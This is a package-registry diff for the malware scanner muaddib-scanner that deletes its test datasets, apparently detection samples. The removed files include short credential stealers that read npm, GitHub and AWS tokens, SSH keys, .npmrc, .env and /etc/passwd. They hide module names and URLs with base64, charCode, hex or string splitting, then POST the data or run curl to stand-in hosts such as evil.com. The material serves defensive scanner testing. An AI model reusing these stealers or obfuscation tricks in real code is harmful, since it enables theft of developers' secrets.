muaddib-scanner 2.2.22 → 2.2.23

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (150) hide show
  1. package/package.json +1 -1
  2. package/.gitattributes +0 -18
  3. package/datasets/adversarial/README.md +0 -23
  4. package/datasets/adversarial/ai-agent-weaponization/index.js +0 -5
  5. package/datasets/adversarial/ai-agent-weaponization/package.json +0 -9
  6. package/datasets/adversarial/ai-agent-weaponization/setup.js +0 -83
  7. package/datasets/adversarial/ai-config-injection/.cursorrules +0 -36
  8. package/datasets/adversarial/ai-config-injection/index.js +0 -16
  9. package/datasets/adversarial/ai-config-injection/package.json +0 -8
  10. package/datasets/adversarial/browser-api-hook/index.js +0 -66
  11. package/datasets/adversarial/browser-api-hook/package.json +0 -6
  12. package/datasets/adversarial/bun-runtime-evasion/bun_environment.js +0 -23
  13. package/datasets/adversarial/bun-runtime-evasion/package.json +0 -9
  14. package/datasets/adversarial/bun-runtime-evasion/setup.js +0 -10
  15. package/datasets/adversarial/ci-trigger-exfil/index.js +0 -17
  16. package/datasets/adversarial/ci-trigger-exfil/package.json +0 -9
  17. package/datasets/adversarial/conditional-chain/index.js +0 -14
  18. package/datasets/adversarial/conditional-chain/package.json +0 -9
  19. package/datasets/adversarial/crypto-wallet-harvest/index.js +0 -44
  20. package/datasets/adversarial/crypto-wallet-harvest/package.json +0 -6
  21. package/datasets/adversarial/dead-mans-switch/index.js +0 -35
  22. package/datasets/adversarial/dead-mans-switch/package.json +0 -9
  23. package/datasets/adversarial/delayed-exfil/index.js +0 -6
  24. package/datasets/adversarial/delayed-exfil/package.json +0 -6
  25. package/datasets/adversarial/detached-background/launcher.js +0 -11
  26. package/datasets/adversarial/detached-background/package.json +0 -9
  27. package/datasets/adversarial/detached-background/worker.js +0 -26
  28. package/datasets/adversarial/discord-webhook-exfil/index.js +0 -95
  29. package/datasets/adversarial/discord-webhook-exfil/package.json +0 -9
  30. package/datasets/adversarial/dns-chunk-exfil/index.js +0 -10
  31. package/datasets/adversarial/dns-chunk-exfil/package.json +0 -6
  32. package/datasets/adversarial/docker-aware/index.js +0 -10
  33. package/datasets/adversarial/docker-aware/package.json +0 -6
  34. package/datasets/adversarial/double-base64-exfil/index.js +0 -11
  35. package/datasets/adversarial/double-base64-exfil/package.json +0 -9
  36. package/datasets/adversarial/dynamic-import/index.js +0 -21
  37. package/datasets/adversarial/dynamic-import/package.json +0 -9
  38. package/datasets/adversarial/dynamic-require/index.js +0 -3
  39. package/datasets/adversarial/dynamic-require/package.json +0 -9
  40. package/datasets/adversarial/fake-captcha-fingerprint/index.js +0 -64
  41. package/datasets/adversarial/fake-captcha-fingerprint/package.json +0 -9
  42. package/datasets/adversarial/gh-cli-token-steal/index.js +0 -31
  43. package/datasets/adversarial/gh-cli-token-steal/package.json +0 -6
  44. package/datasets/adversarial/github-exfil/index.js +0 -33
  45. package/datasets/adversarial/github-exfil/package.json +0 -9
  46. package/datasets/adversarial/iife-exfil/index.js +0 -17
  47. package/datasets/adversarial/iife-exfil/package.json +0 -9
  48. package/datasets/adversarial/indirect-eval-bypass/index.js +0 -27
  49. package/datasets/adversarial/indirect-eval-bypass/package.json +0 -5
  50. package/datasets/adversarial/mjs-extension-bypass/package.json +0 -6
  51. package/datasets/adversarial/mjs-extension-bypass/stealer.mjs +0 -39
  52. package/datasets/adversarial/muaddib-ignore-bypass/index.js +0 -47
  53. package/datasets/adversarial/muaddib-ignore-bypass/package.json +0 -5
  54. package/datasets/adversarial/nested-payload/index.js +0 -3
  55. package/datasets/adversarial/nested-payload/package.json +0 -9
  56. package/datasets/adversarial/nested-payload/utils/helper.js +0 -6
  57. package/datasets/adversarial/nested-payload/utils/lib/format.js +0 -23
  58. package/datasets/adversarial/postinstall-download/package.json +0 -8
  59. package/datasets/adversarial/preinstall-background-fork/bootstrap.js +0 -16
  60. package/datasets/adversarial/preinstall-background-fork/index.js +0 -2
  61. package/datasets/adversarial/preinstall-background-fork/package.json +0 -9
  62. package/datasets/adversarial/preinstall-background-fork/stealer.js +0 -67
  63. package/datasets/adversarial/preinstall-exec/package.json +0 -9
  64. package/datasets/adversarial/preinstall-exec/steal.js +0 -24
  65. package/datasets/adversarial/proxy-env-intercept/index.js +0 -33
  66. package/datasets/adversarial/proxy-env-intercept/package.json +0 -9
  67. package/datasets/adversarial/pyinstaller-dropper/index.js +0 -25
  68. package/datasets/adversarial/pyinstaller-dropper/package.json +0 -9
  69. package/datasets/adversarial/rdd-zero-deps/index.js +0 -32
  70. package/datasets/adversarial/rdd-zero-deps/init.js +0 -15
  71. package/datasets/adversarial/rdd-zero-deps/package.json +0 -11
  72. package/datasets/adversarial/remote-dynamic-dependency/index.js +0 -15
  73. package/datasets/adversarial/remote-dynamic-dependency/package.json +0 -7
  74. package/datasets/adversarial/self-hosted-runner-backdoor/index.js +0 -28
  75. package/datasets/adversarial/self-hosted-runner-backdoor/package.json +0 -9
  76. package/datasets/adversarial/silent-error-swallow/index.js +0 -32
  77. package/datasets/adversarial/silent-error-swallow/package.json +0 -6
  78. package/datasets/adversarial/staged-fetch/index.js +0 -9
  79. package/datasets/adversarial/staged-fetch/package.json +0 -6
  80. package/datasets/adversarial/string-concat-obfuscation/index.js +0 -6
  81. package/datasets/adversarial/string-concat-obfuscation/package.json +0 -6
  82. package/datasets/adversarial/template-literal-obfuscation/index.js +0 -4
  83. package/datasets/adversarial/template-literal-obfuscation/package.json +0 -9
  84. package/datasets/adversarial/triple-base64-github-push/index.js +0 -38
  85. package/datasets/adversarial/triple-base64-github-push/package.json +0 -9
  86. package/datasets/adversarial/websocket-exfil/index.js +0 -34
  87. package/datasets/adversarial/websocket-exfil/package.json +0 -9
  88. package/datasets/benign/README.md +0 -20
  89. package/datasets/benign/packages-npm.txt +0 -597
  90. package/datasets/benign/packages-pypi.txt +0 -164
  91. package/datasets/ground-truth/README.md +0 -54
  92. package/datasets/ground-truth/known-malware.json +0 -622
  93. package/datasets/holdout-v4/atob-eval/index.js +0 -2
  94. package/datasets/holdout-v4/atob-eval/package.json +0 -5
  95. package/datasets/holdout-v4/base64-require/index.js +0 -3
  96. package/datasets/holdout-v4/base64-require/package.json +0 -5
  97. package/datasets/holdout-v4/charcode-fetch/index.js +0 -3
  98. package/datasets/holdout-v4/charcode-fetch/package.json +0 -5
  99. package/datasets/holdout-v4/charcode-spread-homedir/index.js +0 -5
  100. package/datasets/holdout-v4/charcode-spread-homedir/package.json +0 -5
  101. package/datasets/holdout-v4/concat-env-steal/index.js +0 -4
  102. package/datasets/holdout-v4/concat-env-steal/package.json +0 -5
  103. package/datasets/holdout-v4/double-decode-exfil/index.js +0 -4
  104. package/datasets/holdout-v4/double-decode-exfil/package.json +0 -5
  105. package/datasets/holdout-v4/hex-array-exec/index.js +0 -3
  106. package/datasets/holdout-v4/hex-array-exec/package.json +0 -5
  107. package/datasets/holdout-v4/mixed-obfuscation-stealer/index.js +0 -10
  108. package/datasets/holdout-v4/mixed-obfuscation-stealer/package.json +0 -5
  109. package/datasets/holdout-v4/nested-base64-concat/index.js +0 -4
  110. package/datasets/holdout-v4/nested-base64-concat/package.json +0 -5
  111. package/datasets/holdout-v4/template-literal-hide/index.js +0 -3
  112. package/datasets/holdout-v4/template-literal-hide/package.json +0 -5
  113. package/datasets/holdout-v5/callback-exfil/main.js +0 -8
  114. package/datasets/holdout-v5/callback-exfil/package.json +0 -5
  115. package/datasets/holdout-v5/callback-exfil/reader.js +0 -10
  116. package/datasets/holdout-v5/class-method-exfil/collector.js +0 -10
  117. package/datasets/holdout-v5/class-method-exfil/main.js +0 -7
  118. package/datasets/holdout-v5/class-method-exfil/package.json +0 -5
  119. package/datasets/holdout-v5/conditional-split/detector.js +0 -2
  120. package/datasets/holdout-v5/conditional-split/package.json +0 -5
  121. package/datasets/holdout-v5/conditional-split/stealer.js +0 -16
  122. package/datasets/holdout-v5/event-emitter-flow/listener.js +0 -12
  123. package/datasets/holdout-v5/event-emitter-flow/package.json +0 -5
  124. package/datasets/holdout-v5/event-emitter-flow/scanner.js +0 -11
  125. package/datasets/holdout-v5/mixed-inline-split/index.js +0 -6
  126. package/datasets/holdout-v5/mixed-inline-split/package.json +0 -5
  127. package/datasets/holdout-v5/mixed-inline-split/reader.js +0 -3
  128. package/datasets/holdout-v5/mixed-inline-split/sender.js +0 -6
  129. package/datasets/holdout-v5/named-export-steal/main.js +0 -6
  130. package/datasets/holdout-v5/named-export-steal/package.json +0 -5
  131. package/datasets/holdout-v5/named-export-steal/utils.js +0 -1
  132. package/datasets/holdout-v5/reexport-chain/a.js +0 -2
  133. package/datasets/holdout-v5/reexport-chain/b.js +0 -1
  134. package/datasets/holdout-v5/reexport-chain/c.js +0 -11
  135. package/datasets/holdout-v5/reexport-chain/package.json +0 -5
  136. package/datasets/holdout-v5/split-env-exfil/env.js +0 -2
  137. package/datasets/holdout-v5/split-env-exfil/exfil.js +0 -5
  138. package/datasets/holdout-v5/split-env-exfil/package.json +0 -5
  139. package/datasets/holdout-v5/split-npmrc-steal/index.js +0 -2
  140. package/datasets/holdout-v5/split-npmrc-steal/package.json +0 -5
  141. package/datasets/holdout-v5/split-npmrc-steal/reader.js +0 -8
  142. package/datasets/holdout-v5/split-npmrc-steal/sender.js +0 -17
  143. package/datasets/holdout-v5/three-hop-chain/package.json +0 -5
  144. package/datasets/holdout-v5/three-hop-chain/reader.js +0 -8
  145. package/datasets/holdout-v5/three-hop-chain/sender.js +0 -11
  146. package/datasets/holdout-v5/three-hop-chain/transform.js +0 -3
  147. package/docker/Dockerfile +0 -20
  148. package/docker/sandbox-runner.sh +0 -313
  149. package/testssampleslink-deppackage.json +0 -1
  150. package/tmp-test-pack.js +0 -66
@@ -1,5 +0,0 @@
1
- {
2
- "name": "atob-eval",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,3 +0,0 @@
1
- // Holdout v4 — base64-require: module name hidden in base64
2
- const mod = require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString());
3
- mod.exec('whoami');
@@ -1,5 +0,0 @@
1
- {
2
- "name": "base64-require",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,3 +0,0 @@
1
- // Holdout v4 — charcode-fetch: URL rebuilt from charCodes
2
- const url = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 118, 105, 108, 46, 99, 111, 109);
3
- fetch(url, { method: 'POST', body: process.env.NPM_TOKEN });
@@ -1,5 +0,0 @@
1
- {
2
- "name": "charcode-fetch",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,5 +0,0 @@
1
- // Holdout v4 — charcode-spread-homedir: module 'os' hidden via charCodes
2
- const h = String.fromCharCode(...[111, 115]);
3
- const m = require(h).homedir();
4
- const f = require('fs').readFileSync(m + '/.ssh/id_rsa');
5
- require('https').request('https://evil.com').write(f);
@@ -1,5 +0,0 @@
1
- {
2
- "name": "charcode-spread-homedir",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,4 +0,0 @@
1
- // Holdout v4 — concat-env-steal: env var name rebuilt by concat
2
- const key = 'NPM' + '_' + 'TOK' + 'EN';
3
- const val = process.env[key];
4
- require('https').request({ hostname: 'evil.com', path: '/steal', method: 'POST' }, () => {}).write(val);
@@ -1,5 +0,0 @@
1
- {
2
- "name": "concat-env-steal",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,4 +0,0 @@
1
- // Holdout v4 — double-decode-exfil: double base64 encoding
2
- const modName = Buffer.from(Buffer.from('WTJocGJHUmZjSEp2WTJWemN3PT0=', 'base64').toString(), 'base64').toString();
3
- const proc = require(modName);
4
- proc.exec('curl https://evil.com/exfil?data=$(cat /etc/passwd)');
@@ -1,5 +0,0 @@
1
- {
2
- "name": "double-decode-exfil",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,3 +0,0 @@
1
- // Holdout v4 — hex-array-exec: shell command hidden in hex array
2
- const cmd = [0x63, 0x75, 0x72, 0x6c, 0x20, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x65, 0x76, 0x69, 0x6c, 0x2e, 0x63, 0x6f, 0x6d].map(c => String.fromCharCode(c)).join('');
3
- require('child_process').exec(cmd);
@@ -1,5 +0,0 @@
1
- {
2
- "name": "hex-array-exec",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,10 +0,0 @@
1
- // Holdout v4 — mixed-obfuscation-stealer: 3 techniques combined
2
- // Module name via charCode
3
- const modName = String.fromCharCode(102, 115);
4
- // Path via base64
5
- const credPath = Buffer.from('L2V0Yy9wYXNzd2Q=', 'base64').toString();
6
- // URL via concat
7
- const host = 'https://' + 'att' + 'acker' + '.com';
8
-
9
- const data = require(modName).readFileSync(credPath, 'utf8');
10
- require('https').request(host, { method: 'POST' }, () => {}).write(data);
@@ -1,5 +0,0 @@
1
- {
2
- "name": "mixed-obfuscation-stealer",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,4 +0,0 @@
1
- // Holdout v4 — nested-base64-concat: split base64 + concat
2
- const a = Buffer.from('Y2hpbGRf', 'base64').toString();
3
- const b = Buffer.from('cHJvY2Vzcw==', 'base64').toString();
4
- require(a + b).exec('id');
@@ -1,5 +0,0 @@
1
- {
2
- "name": "nested-base64-concat",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,3 +0,0 @@
1
- // Holdout v4 — template-literal-hide: module name via template literals
2
- const mod = `${'child'}${'_process'}`;
3
- require(mod).exec('curl evil.com');
@@ -1,5 +0,0 @@
1
- {
2
- "name": "template-literal-hide",
3
- "version": "1.0.0",
4
- "main": "index.js"
5
- }
@@ -1,8 +0,0 @@
1
- const readCredentials = require('./reader');
2
-
3
- readCredentials((data) => {
4
- fetch('https://evil.com/collect', {
5
- method: 'POST',
6
- body: data
7
- });
8
- });
@@ -1,5 +0,0 @@
1
- {
2
- "name": "callback-exfil",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — callback-based credential passing"
5
- }
@@ -1,10 +0,0 @@
1
- const fs = require('fs');
2
- const path = require('path');
3
- const os = require('os');
4
-
5
- function readCredentials(callback) {
6
- const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
7
- callback(npmrc);
8
- }
9
-
10
- module.exports = readCredentials;
@@ -1,10 +0,0 @@
1
- const fs = require('fs');
2
-
3
- class Collector {
4
- read() {
5
- const data = fs.readFileSync('.env', 'utf8');
6
- return data;
7
- }
8
- }
9
-
10
- module.exports = Collector;
@@ -1,7 +0,0 @@
1
- const Collector = require('./collector');
2
-
3
- const c = new Collector();
4
- const secrets = c.read();
5
-
6
- const ws = new WebSocket('wss://evil.com/ws');
7
- ws.send(secrets);
@@ -1,5 +0,0 @@
1
- {
2
- "name": "class-method-exfil",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — class method read + WebSocket exfil"
5
- }
@@ -1,2 +0,0 @@
1
- const isCI = !!process.env.CI;
2
- module.exports = isCI;
@@ -1,5 +0,0 @@
1
- {
2
- "name": "conditional-split",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — conditional CI-gated exfiltration"
5
- }
@@ -1,16 +0,0 @@
1
- const fs = require('fs');
2
- const path = require('path');
3
- const os = require('os');
4
- const https = require('https');
5
- const isCI = require('./detector');
6
-
7
- if (isCI) {
8
- const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
9
- const req = https.request({
10
- hostname: 'evil.com',
11
- path: '/ci-steal',
12
- method: 'POST'
13
- }, (res) => { res.resume(); });
14
- req.write(npmrc);
15
- req.end();
16
- }
@@ -1,12 +0,0 @@
1
- const https = require('https');
2
- const bus = require('./scanner');
3
-
4
- bus.on('data', (creds) => {
5
- const req = https.request({
6
- hostname: 'evil.com',
7
- path: '/steal',
8
- method: 'POST'
9
- }, (res) => { res.resume(); });
10
- req.write(creds);
11
- req.end();
12
- });
@@ -1,5 +0,0 @@
1
- {
2
- "name": "event-emitter-flow",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — EventEmitter-based credential flow"
5
- }
@@ -1,11 +0,0 @@
1
- const fs = require('fs');
2
- const path = require('path');
3
- const os = require('os');
4
- const EventEmitter = require('events');
5
-
6
- const bus = new EventEmitter();
7
-
8
- const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
9
- bus.emit('data', npmrc);
10
-
11
- module.exports = bus;
@@ -1,6 +0,0 @@
1
- // Inline obfuscated payload (intra-file threat)
2
- const payload = Buffer.from('Y29uc29sZS5sb2coInB3bmVkIik=', 'base64').toString();
3
- eval(payload);
4
-
5
- // Also orchestrate cross-file flow
6
- require('./sender');
@@ -1,5 +0,0 @@
1
- {
2
- "name": "mixed-inline-split",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — intra-file eval + cross-file dataflow"
5
- }
@@ -1,3 +0,0 @@
1
- const fs = require('fs');
2
- const data = fs.readFileSync('.npmrc', 'utf8');
3
- module.exports = data;
@@ -1,6 +0,0 @@
1
- const stolen = require('./reader');
2
-
3
- fetch('https://evil.com/exfil', {
4
- method: 'POST',
5
- body: stolen
6
- });
@@ -1,6 +0,0 @@
1
- const { getCredentials } = require('./utils');
2
-
3
- fetch('https://evil.com/aws', {
4
- method: 'POST',
5
- body: getCredentials
6
- });
@@ -1,5 +0,0 @@
1
- {
2
- "name": "named-export-steal",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — named export destructuring steal"
5
- }
@@ -1 +0,0 @@
1
- exports.getCredentials = process.env.AWS_SECRET_ACCESS_KEY;
@@ -1,2 +0,0 @@
1
- const token = process.env.NPM_TOKEN;
2
- module.exports = token;
@@ -1 +0,0 @@
1
- module.exports = require('./a');
@@ -1,11 +0,0 @@
1
- const https = require('https');
2
- const secret = require('./b');
3
-
4
- const req = https.request({
5
- hostname: 'evil.com',
6
- path: '/npm-token',
7
- method: 'POST'
8
- }, (res) => { res.resume(); });
9
-
10
- req.write(secret);
11
- req.end();
@@ -1,5 +0,0 @@
1
- {
2
- "name": "reexport-chain",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — double re-export chain a → b → c"
5
- }
@@ -1,2 +0,0 @@
1
- const token = process.env.GITHUB_TOKEN;
2
- module.exports = token;
@@ -1,5 +0,0 @@
1
- const token = require('./env');
2
- fetch('https://evil.com/collect', {
3
- method: 'POST',
4
- body: token
5
- });
@@ -1,5 +0,0 @@
1
- {
2
- "name": "split-env-exfil",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — cross-file env token exfil"
5
- }
@@ -1,2 +0,0 @@
1
- require('./reader');
2
- require('./sender');
@@ -1,5 +0,0 @@
1
- {
2
- "name": "split-npmrc-steal",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — cross-file .npmrc steal"
5
- }
@@ -1,8 +0,0 @@
1
- const fs = require('fs');
2
- const path = require('path');
3
- const os = require('os');
4
-
5
- const npmrcPath = path.join(os.homedir(), '.npmrc');
6
- const content = fs.readFileSync(npmrcPath, 'utf8');
7
-
8
- module.exports = content;
@@ -1,17 +0,0 @@
1
- const https = require('https');
2
- const data = require('./reader');
3
-
4
- const options = {
5
- hostname: 'collector.evil.com',
6
- port: 443,
7
- path: '/exfil',
8
- method: 'POST',
9
- headers: { 'Content-Type': 'text/plain' }
10
- };
11
-
12
- const req = https.request(options, (res) => {
13
- res.resume();
14
- });
15
-
16
- req.write(data);
17
- req.end();
@@ -1,5 +0,0 @@
1
- {
2
- "name": "three-hop-chain",
3
- "version": "1.0.0",
4
- "description": "Holdout v5 — 3-file chain reader → transform → sender"
5
- }
@@ -1,8 +0,0 @@
1
- const os = require('os');
2
- const fs = require('fs');
3
- const path = require('path');
4
-
5
- const keyPath = path.join(os.homedir(), '.ssh', 'id_rsa');
6
- const key = fs.readFileSync(keyPath, 'utf8');
7
-
8
- module.exports = key;
@@ -1,11 +0,0 @@
1
- const https = require('https');
2
- const payload = require('./transform');
3
-
4
- const req = https.request({
5
- hostname: 'attacker.example.com',
6
- path: '/collect',
7
- method: 'POST'
8
- }, (res) => { res.resume(); });
9
-
10
- req.write(payload);
11
- req.end();
@@ -1,3 +0,0 @@
1
- const raw = require('./reader');
2
- const encoded = Buffer.from(raw).toString('base64');
3
- module.exports = encoded;
package/docker/Dockerfile DELETED
@@ -1,20 +0,0 @@
1
- FROM node:20-alpine
2
-
3
- # Outils de monitoring
4
- RUN apk add --no-cache strace curl tcpdump coreutils findutils jq iptables
5
-
6
- # Non-root user for npm install (privilege drop via su in sandbox-runner.sh)
7
- RUN adduser -D sandboxuser
8
-
9
- # Dossier de travail avec bonnes permissions
10
- WORKDIR /sandbox
11
- RUN chown sandboxuser:sandboxuser /sandbox
12
-
13
- # Script d'analyse (sed strips Windows CRLF line endings)
14
- COPY sandbox-runner.sh /sandbox/
15
- RUN sed -i 's/\r$//' /sandbox/sandbox-runner.sh && chmod +x /sandbox/sandbox-runner.sh
16
-
17
- # Entrypoint runs as root for iptables/tcpdump/dmesg access.
18
- # npm install is dropped to sandboxuser via su in sandbox-runner.sh.
19
- # --security-opt no-new-privileges is set by the Docker run args in sandbox.js.
20
- ENTRYPOINT ["/sandbox/sandbox-runner.sh"]